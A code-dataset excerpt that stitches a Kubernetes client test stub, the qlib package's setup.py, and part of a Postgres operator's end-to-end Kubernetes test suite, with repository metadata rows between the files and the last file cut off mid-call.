class TestV1beta2DeploymentSpec(unittest.TestCase):
""" V1beta2DeploymentSpec unit test stubs """
def setUp(self):
pass
def tearDown(self):
pass
def testV1beta2DeploymentSpec(self):
"""
Test V1beta2DeploymentSpec
"""
# FIXME: construct object with mandatory attributes with example values
#model = kubernetes.client.models.v1beta2_deployment_spec.V1beta2DeploymentSpec()
pass
if __name__ == '__main__':
unittest.main()
| 22.266667
| 105
| 0.720559
|
cc495824eb3e5e3110d1ba5eb004e7ff03a24d63
| 3,287
|
py
|
Python
|
setup.py
|
aqts/qlib
|
2c5864204ecc747f11a63574efd07ff237123ff3
|
[
"MIT"
] | 2
|
2021-01-28T09:02:14.000Z
|
2021-04-16T18:02:22.000Z
|
setup.py
|
Xryi/qlib
|
2c5864204ecc747f11a63574efd07ff237123ff3
|
[
"MIT"
] | 1
|
2021-05-16T14:17:56.000Z
|
2021-05-19T07:07:20.000Z
|
setup.py
|
Xryi/qlib
|
2c5864204ecc747f11a63574efd07ff237123ff3
|
[
"MIT"
] | 1
|
2020-12-10T03:58:33.000Z
|
2020-12-10T03:58:33.000Z
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import io
import os
import numpy
from setuptools import find_packages, setup, Extension
# Package meta-data.
NAME = "pyqlib"
DESCRIPTION = "A Quantitative-research Platform"
REQUIRES_PYTHON = ">=3.5.0"
VERSION = "0.6.0.dev"
# Detect Cython
try:
import Cython
ver = Cython.__version__
_CYTHON_INSTALLED = ver >= "0.28"
except ImportError:
_CYTHON_INSTALLED = False
if not _CYTHON_INSTALLED:
print("Required Cython version >= 0.28 is not detected!")
print('Please run "pip install --upgrade cython" first.')
exit(-1)
# What packages are required for this module to be executed?
# `estimator` may depend on other packages. In order to reduce dependencies, it is not written here.
REQUIRED = [
"numpy>=1.12.0",
"pandas>=0.25.1",
"scipy>=1.0.0",
"requests>=2.18.0",
"sacred>=0.7.4",
"pymongo==3.7.2",
"python-socketio==3.1.2",
"redis>=3.0.1",
"python-redis-lock>=3.3.1",
"schedule>=0.6.0",
"cvxpy==1.0.21",
"hyperopt==0.1.1",
"fire>=0.3.1",
"statsmodels",
"xlrd>=1.0.0",
"plotly==4.12.0",
"matplotlib==3.1.3",
"tables>=3.6.1",
"pyyaml>=5.3.1",
"mlflow>=1.12.1",
"tqdm",
"loguru",
"lightgbm",
"tornado",
"joblib>=0.17.0",
"fire>=0.3.1",
"ruamel.yaml>=0.16.12",
]
# Numpy include
NUMPY_INCLUDE = numpy.get_include()
here = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(here, "README.md"), encoding="utf-8") as f:
long_description = f.read()
# Cython Extensions
extensions = [
Extension(
"qlib.data._libs.rolling",
["qlib/data/_libs/rolling.pyx"],
language="c++",
include_dirs=[NUMPY_INCLUDE],
),
Extension(
"qlib.data._libs.expanding",
["qlib/data/_libs/expanding.pyx"],
language="c++",
include_dirs=[NUMPY_INCLUDE],
),
]
# Where the magic happens:
setup(
name=NAME,
version=VERSION,
license="MIT Licence",
url="https://github.com/microsoft/qlib",
description=DESCRIPTION,
long_description=long_description,
long_description_content_type="text/markdown",
python_requires=REQUIRES_PYTHON,
packages=find_packages(exclude=("tests",)),
# if your package is a single module, use this instead of 'packages':
# py_modules=['qlib'],
entry_points={
# 'console_scripts': ['mycli=mymodule:cli'],
"console_scripts": [
"qrun=qlib.workflow.cli:run",
],
},
ext_modules=extensions,
install_requires=REQUIRED,
include_package_data=True,
classifiers=[
# Trove classifiers
# Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
# 'License :: OSI Approved :: MIT License',
"Operating System :: POSIX :: Linux",
"Operating System :: Microsoft :: Windows",
"Operating System :: MacOS",
"License :: OSI Approved :: MIT License",
"Development Status :: 3 - Alpha",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
],
)
| 26.296
| 100
| 0.616672
|
44cca9919169f5efaefa858a512376e1c3ba9875
| 56,258
|
py
|
Python
|
e2e/tests/test_e2e.py
|
flant/postgres-operator
|
040a49a922eead59c342a465446591ddbf90a57b
|
[
"MIT"
] | 11
|
2020-09-25T11:30:49.000Z
|
2021-12-08T20:49:14.000Z
|
e2e/tests/test_e2e.py
|
flant/postgres-operator
|
040a49a922eead59c342a465446591ddbf90a57b
|
[
"MIT"
] | null | null | null |
e2e/tests/test_e2e.py
|
flant/postgres-operator
|
040a49a922eead59c342a465446591ddbf90a57b
|
[
"MIT"
] | 1
|
2022-02-03T18:05:30.000Z
|
2022-02-03T18:05:30.000Z
|
import json
import unittest
import time
import timeout_decorator
import os
import yaml
from datetime import datetime
from kubernetes import client
from tests.k8s_api import K8s
from kubernetes.client.rest import ApiException
SPILO_CURRENT = "registry.opensource.zalan.do/acid/spilo-13-e2e:0.3"
SPILO_LAZY = "registry.opensource.zalan.do/acid/spilo-13-e2e:0.4"
def to_selector(labels):
return ",".join(["=".join(lbl) for lbl in labels.items()])
def clean_list(values):
# value is not stripped bytes, strip and convert to a string
clean = lambda v: v.strip().decode()
notNone = lambda v: v
return list(filter(notNone, map(clean, values)))
class EndToEndTestCase(unittest.TestCase):
'''
Test interaction of the operator with multiple K8s components.
'''
# `kind` pods may stuck in the `Terminating` phase for a few minutes; hence high test timeout
TEST_TIMEOUT_SEC = 600
def eventuallyEqual(self, f, x, m, retries=60, interval=2):
while True:
try:
y = f()
self.assertEqual(y, x, m.format(y))
return True
except AssertionError:
retries = retries - 1
if not retries > 0:
raise
time.sleep(interval)
def eventuallyNotEqual(self, f, x, m, retries=60, interval=2):
while True:
try:
y = f()
self.assertNotEqual(y, x, m.format(y))
return True
except AssertionError:
retries = retries - 1
if not retries > 0:
raise
time.sleep(interval)
def eventuallyTrue(self, f, m, retries=60, interval=2):
while True:
try:
self.assertTrue(f(), m)
return True
except AssertionError:
retries = retries - 1
if not retries > 0:
raise
time.sleep(interval)
@classmethod
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def setUpClass(cls):
'''
Deploy operator to a "kind" cluster created by run.sh using examples from /manifests.
This operator deployment is to be shared among all tests.
run.sh deletes the 'kind' cluster after successful run along with all operator-related entities.
In the case of test failure the cluster will stay to enable manual examination;
next invocation of "make test" will re-create it.
'''
print("Test Setup being executed")
# set a single K8s wrapper for all tests
k8s = cls.k8s = K8s()
# remove existing local storage class and create hostpath class
try:
k8s.api.storage_v1_api.delete_storage_class("standard")
except ApiException as e:
print("Failed to delete the 'standard' storage class: {0}".format(e))
# operator deploys pod service account there on start up
# needed for test_multi_namespace_support()
cls.test_namespace = "test"
try:
v1_namespace = client.V1Namespace(metadata=client.V1ObjectMeta(name=cls.test_namespace))
k8s.api.core_v1.create_namespace(v1_namespace)
except ApiException as e:
print("Failed to create the '{0}' namespace: {1}".format(cls.test_namespace, e))
# submit the most recent operator image built on the Docker host
with open("manifests/postgres-operator.yaml", 'r+') as f:
operator_deployment = yaml.safe_load(f)
operator_deployment["spec"]["template"]["spec"]["containers"][0]["image"] = os.environ['OPERATOR_IMAGE']
with open("manifests/postgres-operator.yaml", 'w') as f:
yaml.dump(operator_deployment, f, Dumper=yaml.Dumper)
with open("manifests/configmap.yaml", 'r+') as f:
configmap = yaml.safe_load(f)
configmap["data"]["workers"] = "1"
configmap["data"]["docker_image"] = SPILO_CURRENT
with open("manifests/configmap.yaml", 'w') as f:
yaml.dump(configmap, f, Dumper=yaml.Dumper)
for filename in ["operator-service-account-rbac.yaml",
"postgresql.crd.yaml",
"operatorconfiguration.crd.yaml",
"postgresteam.crd.yaml",
"configmap.yaml",
"postgres-operator.yaml",
"api-service.yaml",
"infrastructure-roles.yaml",
"infrastructure-roles-new.yaml",
"e2e-storage-class.yaml"]:
result = k8s.create_with_kubectl("manifests/" + filename)
print("stdout: {}, stderr: {}".format(result.stdout, result.stderr))
k8s.wait_for_operator_pod_start()
# reset taints and tolerations
k8s.api.core_v1.patch_node("postgres-operator-e2e-tests-worker", {"spec": {"taints": []}})
k8s.api.core_v1.patch_node("postgres-operator-e2e-tests-worker2", {"spec": {"taints": []}})
# make sure we start a new operator on every new run,
# this tackles the problem when kind is reused
# and the Docker image is in fact changed (dirty one)
k8s.update_config({}, step="TestSuite Startup")
actual_operator_image = k8s.api.core_v1.list_namespaced_pod(
'default', label_selector='name=postgres-operator').items[0].spec.containers[0].image
print("Tested operator image: {}".format(actual_operator_image)) # shows up after tests finish
result = k8s.create_with_kubectl("manifests/minimal-postgres-manifest.yaml")
print('stdout: {}, stderr: {}'.format(result.stdout, result.stderr))
try:
k8s.wait_for_pod_start('spilo-role=master')
k8s.wait_for_pod_start('spilo-role=replica')
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_overwrite_pooler_deployment(self):
self.k8s.create_with_kubectl("manifests/minimal-fake-pooler-deployment.yaml")
self.eventuallyEqual(lambda: self.k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
self.eventuallyEqual(lambda: self.k8s.get_deployment_replica_count(name="acid-minimal-cluster-pooler"), 1,
"Initial broken deployment not rolled out")
self.k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'enableConnectionPooler': True
}
})
self.eventuallyEqual(lambda: self.k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
self.eventuallyEqual(lambda: self.k8s.get_deployment_replica_count(name="acid-minimal-cluster-pooler"), 2,
"Operator did not succeed in overwriting labels")
self.k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'enableConnectionPooler': False
}
})
self.eventuallyEqual(lambda: self.k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
self.eventuallyEqual(lambda: self.k8s.count_running_pods("connection-pooler=acid-minimal-cluster-pooler"),
0, "Pooler pods not scaled down")
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_enable_disable_connection_pooler(self):
'''
For a database without connection pooler, then turns it on, scale up,
turn off and on again. Test with different ways of doing this (via
enableConnectionPooler or connectionPooler configuration section). At
the end turn connection pooler off to not interfere with other tests.
'''
k8s = self.k8s
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"}, "Operator does not get in sync")
k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'enableConnectionPooler': True,
'enableReplicaConnectionPooler': True,
}
})
self.eventuallyEqual(lambda: k8s.get_deployment_replica_count(), 2,
"Deployment replicas is 2 default")
self.eventuallyEqual(lambda: k8s.count_running_pods(
"connection-pooler=acid-minimal-cluster-pooler"),
2, "No pooler pods found")
self.eventuallyEqual(lambda: k8s.count_running_pods(
"connection-pooler=acid-minimal-cluster-pooler-repl"),
2, "No pooler replica pods found")
self.eventuallyEqual(lambda: k8s.count_services_with_label(
'application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
2, "No pooler service found")
self.eventuallyEqual(lambda: k8s.count_secrets_with_label('application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
1, "Pooler secret not created")
# Turn off only master connection pooler
k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'enableConnectionPooler': False,
'enableReplicaConnectionPooler': True,
}
})
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"},
"Operator does not get in sync")
self.eventuallyEqual(lambda: k8s.get_deployment_replica_count(name="acid-minimal-cluster-pooler-repl"), 2,
"Deployment replicas is 2 default")
self.eventuallyEqual(lambda: k8s.count_running_pods(
"connection-pooler=acid-minimal-cluster-pooler"),
0, "Master pooler pods not deleted")
self.eventuallyEqual(lambda: k8s.count_running_pods(
"connection-pooler=acid-minimal-cluster-pooler-repl"),
2, "Pooler replica pods not found")
self.eventuallyEqual(lambda: k8s.count_services_with_label(
'application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
1, "No pooler service found")
self.eventuallyEqual(lambda: k8s.count_secrets_with_label('application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
1, "Secret not created")
# Turn off only replica connection pooler
k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'enableConnectionPooler': True,
'enableReplicaConnectionPooler': False,
}
})
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"},
"Operator does not get in sync")
self.eventuallyEqual(lambda: k8s.get_deployment_replica_count(), 2,
"Deployment replicas is 2 default")
self.eventuallyEqual(lambda: k8s.count_running_pods("connection-pooler=acid-minimal-cluster-pooler"),
2, "Master pooler pods not found")
self.eventuallyEqual(lambda: k8s.count_running_pods("connection-pooler=acid-minimal-cluster-pooler-repl"),
0, "Pooler replica pods not deleted")
self.eventuallyEqual(lambda: k8s.count_services_with_label('application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
1, "No pooler service found")
self.eventuallyEqual(lambda: k8s.count_secrets_with_label('application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
1, "Secret not created")
# scale up connection pooler deployment
k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'connectionPooler': {
'numberOfInstances': 3,
},
}
})
self.eventuallyEqual(lambda: k8s.get_deployment_replica_count(), 3,
"Deployment replicas is scaled to 3")
self.eventuallyEqual(lambda: k8s.count_running_pods("connection-pooler=acid-minimal-cluster-pooler"),
3, "Scale up of pooler pods does not work")
# turn it off, keeping config should be overwritten by false
k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'enableConnectionPooler': False,
'enableReplicaConnectionPooler': False,
}
})
self.eventuallyEqual(lambda: k8s.count_running_pods("connection-pooler=acid-minimal-cluster-pooler"),
0, "Pooler pods not scaled down")
self.eventuallyEqual(lambda: k8s.count_services_with_label('application=db-connection-pooler,cluster-name=acid-minimal-cluster'),
0, "Pooler service not removed")
self.eventuallyEqual(lambda: k8s.count_secrets_with_label('application=spilo,cluster-name=acid-minimal-cluster'),
4, "Secrets not deleted")
# Verify that all the databases have pooler schema installed.
# Do this via psql, since otherwise we need to deal with
# credentials.
dbList = []
leader = k8s.get_cluster_leader_pod('acid-minimal-cluster')
dbListQuery = "select datname from pg_database"
schemasQuery = """
select schema_name
from information_schema.schemata
where schema_name = 'pooler'
"""
exec_query = r"psql -tAq -c \"{}\" -d {}"
if leader:
try:
q = exec_query.format(dbListQuery, "postgres")
q = "su postgres -c \"{}\"".format(q)
print('Get databases: {}'.format(q))
result = k8s.exec_with_kubectl(leader.metadata.name, q)
dbList = clean_list(result.stdout.split(b'\n'))
print('dbList: {}, stdout: {}, stderr {}'.format(
dbList, result.stdout, result.stderr
))
except Exception as ex:
print('Could not get databases: {}'.format(ex))
print('Stdout: {}'.format(result.stdout))
print('Stderr: {}'.format(result.stderr))
for db in dbList:
if db in ('template0', 'template1'):
continue
schemas = []
try:
q = exec_query.format(schemasQuery, db)
q = "su postgres -c \"{}\"".format(q)
print('Get schemas: {}'.format(q))
result = k8s.exec_with_kubectl(leader.metadata.name, q)
schemas = clean_list(result.stdout.split(b'\n'))
print('schemas: {}, stdout: {}, stderr {}'.format(
schemas, result.stdout, result.stderr
))
except Exception as ex:
print('Could not get databases: {}'.format(ex))
print('Stdout: {}'.format(result.stdout))
print('Stderr: {}'.format(result.stderr))
self.assertNotEqual(len(schemas), 0)
else:
print('Could not find leader pod')
# remove config section to make test work next time
k8s.api.custom_objects_api.patch_namespaced_custom_object(
'acid.zalan.do', 'v1', 'default',
'postgresqls', 'acid-minimal-cluster',
{
'spec': {
'connectionPooler': None,
'EnableReplicaConnectionPooler': False,
}
})
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_enable_load_balancer(self):
'''
Test if services are updated when enabling/disabling load balancers in Postgres manifest
'''
k8s = self.k8s
cluster_label = 'application=spilo,cluster-name=acid-minimal-cluster,spilo-role={}'
self.eventuallyEqual(lambda: k8s.get_service_type(cluster_label.format("master")),
'ClusterIP',
"Expected ClusterIP type initially, found {}")
try:
# enable load balancer services
pg_patch_enable_lbs = {
"spec": {
"enableMasterLoadBalancer": True,
"enableReplicaLoadBalancer": True
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_enable_lbs)
self.eventuallyEqual(lambda: k8s.get_service_type(cluster_label.format("master")),
'LoadBalancer',
"Expected LoadBalancer service type for master, found {}")
self.eventuallyEqual(lambda: k8s.get_service_type(cluster_label.format("replica")),
'LoadBalancer',
"Expected LoadBalancer service type for master, found {}")
# disable load balancer services again
pg_patch_disable_lbs = {
"spec": {
"enableMasterLoadBalancer": False,
"enableReplicaLoadBalancer": False
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_disable_lbs)
self.eventuallyEqual(lambda: k8s.get_service_type(cluster_label.format("master")),
'ClusterIP',
"Expected LoadBalancer service type for master, found {}")
self.eventuallyEqual(lambda: k8s.get_service_type(cluster_label.format("replica")),
'ClusterIP',
"Expected LoadBalancer service type for master, found {}")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_infrastructure_roles(self):
'''
Test using external secrets for infrastructure roles
'''
k8s = self.k8s
# update infrastructure roles description
secret_name = "postgresql-infrastructure-roles"
roles = "secretname: postgresql-infrastructure-roles-new, userkey: user,"\
"rolekey: memberof, passwordkey: password, defaultrolevalue: robot_zmon"
patch_infrastructure_roles = {
"data": {
"infrastructure_roles_secret_name": secret_name,
"infrastructure_roles_secrets": roles,
},
}
k8s.update_config(patch_infrastructure_roles)
self.eventuallyEqual(lambda: k8s.get_operator_state(), {"0": "idle"},
"Operator does not get in sync")
try:
# check that new roles are represented in the config by requesting the
# operator configuration via API
def verify_role():
try:
operator_pod = k8s.get_operator_pod()
get_config_cmd = "wget --quiet -O - localhost:8080/config"
result = k8s.exec_with_kubectl(operator_pod.metadata.name,
get_config_cmd)
try:
roles_dict = (json.loads(result.stdout)
.get("controller", {})
.get("InfrastructureRoles"))
except:
return False
if "robot_zmon_acid_monitoring_new" in roles_dict:
role = roles_dict["robot_zmon_acid_monitoring_new"]
role.pop("Password", None)
self.assertDictEqual(role, {
"Name": "robot_zmon_acid_monitoring_new",
"Flags": None,
"MemberOf": ["robot_zmon"],
"Parameters": None,
"AdminRole": "",
"Origin": 2,
})
return True
except:
pass
return False
self.eventuallyTrue(verify_role, "infrastructure role setup is not loaded")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_lazy_spilo_upgrade(self):
'''
Test lazy upgrade for the Spilo image: operator changes a stateful set
but lets pods run with the old image until they are recreated for
reasons other than operator's activity. That works because the operator
configures stateful sets to use "onDelete" pod update policy.
The test covers:
1) enabling lazy upgrade in existing operator deployment
2) forcing the normal rolling upgrade by changing the operator
configmap and restarting its pod
'''
k8s = self.k8s
pod0 = 'acid-minimal-cluster-0'
pod1 = 'acid-minimal-cluster-1'
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2,
"No 2 pods running")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members(pod0)),
2, "Postgres status did not enter running")
patch_lazy_spilo_upgrade = {
"data": {
"docker_image": SPILO_CURRENT,
"enable_lazy_spilo_upgrade": "false"
}
}
k8s.update_config(patch_lazy_spilo_upgrade,
step="Init baseline image version")
self.eventuallyEqual(lambda: k8s.get_statefulset_image(), SPILO_CURRENT,
"Statefulset not updated initially")
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2,
"No 2 pods running")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members(pod0)),
2, "Postgres status did not enter running")
self.eventuallyEqual(lambda: k8s.get_effective_pod_image(pod0),
SPILO_CURRENT, "Rolling upgrade was not executed")
self.eventuallyEqual(lambda: k8s.get_effective_pod_image(pod1),
SPILO_CURRENT, "Rolling upgrade was not executed")
# update docker image in config and enable the lazy upgrade
conf_image = SPILO_LAZY
patch_lazy_spilo_upgrade = {
"data": {
"docker_image": conf_image,
"enable_lazy_spilo_upgrade": "true"
}
}
k8s.update_config(patch_lazy_spilo_upgrade,
step="patch image and lazy upgrade")
self.eventuallyEqual(lambda: k8s.get_statefulset_image(), conf_image,
"Statefulset not updated to next Docker image")
try:
# restart the pod to get a container with the new image
k8s.api.core_v1.delete_namespaced_pod(pod0, 'default')
# verify only pod-0 which was deleted got new image from statefulset
self.eventuallyEqual(lambda: k8s.get_effective_pod_image(pod0),
conf_image, "Delete pod-0 did not get new spilo image")
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2,
"No two pods running after lazy rolling upgrade")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members(pod0)),
2, "Postgres status did not enter running")
self.assertNotEqual(lambda: k8s.get_effective_pod_image(pod1),
SPILO_CURRENT,
"pod-1 should not have change Docker image to {}".format(SPILO_CURRENT))
# clean up
unpatch_lazy_spilo_upgrade = {
"data": {
"enable_lazy_spilo_upgrade": "false",
}
}
k8s.update_config(unpatch_lazy_spilo_upgrade, step="patch lazy upgrade")
# at this point operator will complete the normal rolling upgrade
# so we additonally test if disabling the lazy upgrade - forcing the normal rolling upgrade - works
self.eventuallyEqual(lambda: k8s.get_effective_pod_image(pod0),
conf_image, "Rolling upgrade was not executed",
50, 3)
self.eventuallyEqual(lambda: k8s.get_effective_pod_image(pod1),
conf_image, "Rolling upgrade was not executed",
50, 3)
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members(pod0)),
2, "Postgres status did not enter running")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_logical_backup_cron_job(self):
'''
Ensure we can (a) create the cron job at user request for a specific PG cluster
(b) update the cluster-wide image for the logical backup pod
(c) delete the job at user request
Limitations:
(a) Does not run the actual batch job because there is no S3 mock to upload backups to
(b) Assumes 'acid-minimal-cluster' exists as defined in setUp
'''
k8s = self.k8s
# create the cron job
schedule = "7 7 7 7 *"
pg_patch_enable_backup = {
"spec": {
"enableLogicalBackup": True,
"logicalBackupSchedule": schedule
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_enable_backup)
try:
self.eventuallyEqual(lambda: len(k8s.get_logical_backup_job().items), 1, "failed to create logical backup job")
job = k8s.get_logical_backup_job().items[0]
self.assertEqual(job.metadata.name, "logical-backup-acid-minimal-cluster",
"Expected job name {}, found {}"
.format("logical-backup-acid-minimal-cluster", job.metadata.name))
self.assertEqual(job.spec.schedule, schedule,
"Expected {} schedule, found {}"
.format(schedule, job.spec.schedule))
# update the cluster-wide image of the logical backup pod
image = "test-image-name"
patch_logical_backup_image = {
"data": {
"logical_backup_docker_image": image,
}
}
k8s.update_config(patch_logical_backup_image, step="patch logical backup image")
def get_docker_image():
jobs = k8s.get_logical_backup_job().items
return jobs[0].spec.job_template.spec.template.spec.containers[0].image
self.eventuallyEqual(get_docker_image, image,
"Expected job image {}, found {}".format(image, "{}"))
# delete the logical backup cron job
pg_patch_disable_backup = {
"spec": {
"enableLogicalBackup": False,
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_disable_backup)
self.eventuallyEqual(lambda: len(k8s.get_logical_backup_job().items), 0, "failed to create logical backup job")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
# ensure cluster is healthy after tests
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members("acid-minimal-cluster-0")), 2, "Postgres status did not enter running")
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_min_resource_limits(self):
'''
Lower resource limits below configured minimum and let operator fix it
'''
k8s = self.k8s
# self.eventuallyEqual(lambda: k8s.pg_get_status(), "Running", "Cluster not healthy at start")
# configure minimum boundaries for CPU and memory limits
minCPULimit = '503m'
minMemoryLimit = '502Mi'
patch_min_resource_limits = {
"data": {
"min_cpu_limit": minCPULimit,
"min_memory_limit": minMemoryLimit
}
}
# lower resource limits below minimum
pg_patch_resources = {
"spec": {
"resources": {
"requests": {
"cpu": "10m",
"memory": "50Mi"
},
"limits": {
"cpu": "200m",
"memory": "200Mi"
}
}
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
"acid.zalan.do", "v1", "default", "postgresqls", "acid-minimal-cluster", pg_patch_resources)
k8s.patch_statefulset({"metadata": {"annotations": {"zalando-postgres-operator-rolling-update-required": "False"}}})
k8s.update_config(patch_min_resource_limits, "Minimum resource test")
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2, "No two pods running after lazy rolling upgrade")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members()), 2, "Postgres status did not enter running")
def verify_pod_limits():
pods = k8s.api.core_v1.list_namespaced_pod('default', label_selector="cluster-name=acid-minimal-cluster,application=spilo").items
if len(pods) < 2:
return False
r = pods[0].spec.containers[0].resources.limits['memory'] == minMemoryLimit
r = r and pods[0].spec.containers[0].resources.limits['cpu'] == minCPULimit
r = r and pods[1].spec.containers[0].resources.limits['memory'] == minMemoryLimit
r = r and pods[1].spec.containers[0].resources.limits['cpu'] == minCPULimit
return r
self.eventuallyTrue(verify_pod_limits, "Pod limits where not adjusted")
@classmethod
def setUp(cls):
# cls.k8s.update_config({}, step="Setup")
cls.k8s.patch_statefulset({"meta": {"annotations": {"zalando-postgres-operator-rolling-update-required": False}}})
pass
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_multi_namespace_support(self):
'''
Create a customized Postgres cluster in a non-default namespace.
'''
k8s = self.k8s
with open("manifests/complete-postgres-manifest.yaml", 'r+') as f:
pg_manifest = yaml.safe_load(f)
pg_manifest["metadata"]["namespace"] = self.test_namespace
yaml.dump(pg_manifest, f, Dumper=yaml.Dumper)
try:
k8s.create_with_kubectl("manifests/complete-postgres-manifest.yaml")
k8s.wait_for_pod_start("spilo-role=master", self.test_namespace)
self.assert_master_is_unique(self.test_namespace, "acid-test-cluster")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
finally:
# delete the new cluster so that the k8s_api.get_operator_state works correctly in subsequent tests
# ideally we should delete the 'test' namespace here but
# the pods inside the namespace stuck in the Terminating state making the test time out
k8s.api.custom_objects_api.delete_namespaced_custom_object(
"acid.zalan.do", "v1", self.test_namespace, "postgresqls", "acid-test-cluster")
time.sleep(5)
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_zz_node_readiness_label(self):
'''
Remove node readiness label from master node. This must cause a failover.
'''
k8s = self.k8s
cluster_label = 'application=spilo,cluster-name=acid-minimal-cluster'
readiness_label = 'lifecycle-status'
readiness_value = 'ready'
try:
# get nodes of master and replica(s) (expected target of new master)
current_master_node, current_replica_nodes = k8s.get_pg_nodes(cluster_label)
num_replicas = len(current_replica_nodes)
failover_targets = self.get_failover_targets(current_master_node, current_replica_nodes)
# add node_readiness_label to potential failover nodes
patch_readiness_label = {
"metadata": {
"labels": {
readiness_label: readiness_value
}
}
}
self.assertTrue(len(failover_targets) > 0, "No failover targets available")
for failover_target in failover_targets:
k8s.api.core_v1.patch_node(failover_target, patch_readiness_label)
# define node_readiness_label in config map which should trigger a failover of the master
patch_readiness_label_config = {
"data": {
"node_readiness_label": readiness_label + ':' + readiness_value,
}
}
k8s.update_config(patch_readiness_label_config, "setting readiness label")
new_master_node, new_replica_nodes = self.assert_failover(
current_master_node, num_replicas, failover_targets, cluster_label)
# patch also node where master ran before
k8s.api.core_v1.patch_node(current_master_node, patch_readiness_label)
# toggle pod anti affinity to move replica away from master node
self.eventuallyTrue(lambda: self.assert_distributed_pods(new_master_node, new_replica_nodes, cluster_label), "Pods are redistributed")
except timeout_decorator.TimeoutError:
print('Operator log: {}'.format(k8s.get_operator_log()))
raise
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_scaling(self):
'''
Scale up from 2 to 3 and back to 2 pods by updating the Postgres manifest at runtime.
'''
k8s = self.k8s
pod = "acid-minimal-cluster-0"
k8s.scale_cluster(3)
self.eventuallyEqual(lambda: k8s.count_running_pods(), 3, "Scale up to 3 failed")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members(pod)), 3, "Not all 3 nodes healthy")
k8s.scale_cluster(2)
self.eventuallyEqual(lambda: k8s.count_running_pods(), 2, "Scale down to 2 failed")
self.eventuallyEqual(lambda: len(k8s.get_patroni_running_members(pod)), 2, "Not all members 2 healthy")
@timeout_decorator.timeout(TEST_TIMEOUT_SEC)
def test_service_annotations(self):
'''
Create a Postgres cluster with service annotations and check them.
'''
k8s = self.k8s
patch_custom_service_annotations = {
"data": {
"custom_service_annotations": "foo:bar",
}
}
k8s.update_config(patch_custom_service_annotations)
pg_patch_custom_annotations = {
"spec": {
"serviceAnnotations": {
"annotation.key": "value",
"alice": "bob",
}
}
}
k8s.api.custom_objects_api.patch_namespaced_custom_object(
